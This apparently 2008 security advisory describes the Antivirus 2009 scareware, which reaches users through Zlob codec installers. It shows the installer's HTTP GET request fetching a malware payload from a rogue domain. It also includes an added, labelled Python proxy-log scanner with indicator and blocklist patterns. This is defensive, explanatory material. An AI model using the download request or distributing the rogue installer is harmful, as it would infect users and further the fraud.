Fake anti-spyware Antivirus 2009 (July 18, 2008)

July 18, 2008

A public beta of Norton Antivirus 2009 opened this week and the scammers didn’t wait long to follow suit with a new bogus scanner: Antivirus 2009.

Antivirus 2009, also known as Antivirus2009, is a rogue anti-spyware program that uses false spyware results to lure you into purchasing its full version. Antivirus2009 is an updated version of Antivirus 2008.

Antivirus 2009 is usually promoted via a ZLOB/MediaAccess Codec installer found on adult websites. Zlob has been the trojan of choice for infecting users with pop-ups disguised as system notifications that lead to websites hosting rogue anti-spyware programs. Antivirus 2009 can also be installed manually from the rogue websites:

More related URLs:


We recommend blocking the domains associated with this threat by editing your local hosts file to redirect them to 127.0.0.1.

When you click SCAN or CHECK YOUR PC, an “AV2009Install_0011.exe” file is pushed onto your system. It’s usually run-time compressed with the UPX or PolyCrypt packer. We have received at least 140 different variants of this threat.

When run, it issues an HTTP GET request as follows:

    GET /download/av2009b.exe HTTP/1.1
    Host: antivirus-2009.com

The fake antimalware product is then installed. It starts reporting fake results and makes the system unusable until a full version is purchased.
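
With at least 140 repacked variants, a hash of one sample will not match the others, but the download host and installer file names stay recognizable in web proxy logs. The following is an added example, not SonicWALL's code: it flags the request described above in a proxy log. The log format, the sample lines, the `.example` hosts and the generalized file-name pattern are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the advisory text.
ROGUE_HOSTS = {"antivirus-2009.com"}
# Assumption: the two file names on the page (av2009b.exe, AV2009Install_0011.exe)
# generalize to a letter suffix or a numeric build suffix.
INSTALLER_RE = re.compile(r"^av2009(install_\d+|[a-z]?)\.exe$", re.IGNORECASE)

# Constructed sample; assumed format: "<time> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2008-07-18T09:14:02 10.0.0.21 GET http://antivirus-2009.com/download/av2009b.exe 200
2008-07-18T09:14:05 10.0.0.21 GET http://WWW.Antivirus-2009.com.:80/ 200
2008-07-18T09:15:40 10.0.0.34 GET http://mirror.example/files/AV2009Install_0011.exe 200
2008-07-18T09:16:11 10.0.0.40 GET http://updates.example/av/setup.exe 200
2008-07-18T09:17:00 10.0.0.41 GET http://antivirus-2009.com.example/tool.exe 200
truncated line
"""


def is_rogue_host(host):
    """True for a listed domain or any of its subdomains (www. and so on)."""
    return any(host == d or host.endswith("." + d) for d in ROGUE_HOSTS)


def scan(log_text):
    """Return (client, host, filename, reasons) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed or truncated entry
        _ts, client, _method, url, _status = parts
        parsed = urlsplit(url)
        # hostname is already lower-cased and port-free; drop a trailing root dot
        host = (parsed.hostname or "").rstrip(".")
        filename = parsed.path.rsplit("/", 1)[-1]
        reasons = []
        if is_rogue_host(host):
            reasons.append("rogue-host")
        if INSTALLER_RE.match(filename):
            reasons.append("installer-name")
        if reasons:
            hits.append((client, host, filename, reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit carrying only "installer-name" means the installer was fetched from a host that is not yet on the blocklist, which is a candidate for adding to it.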

SonicWALL is blocking this threat with GAV: XPAntivirus_12 (Adware) and GAV: Fakealert.TY (Trojan) signatures.
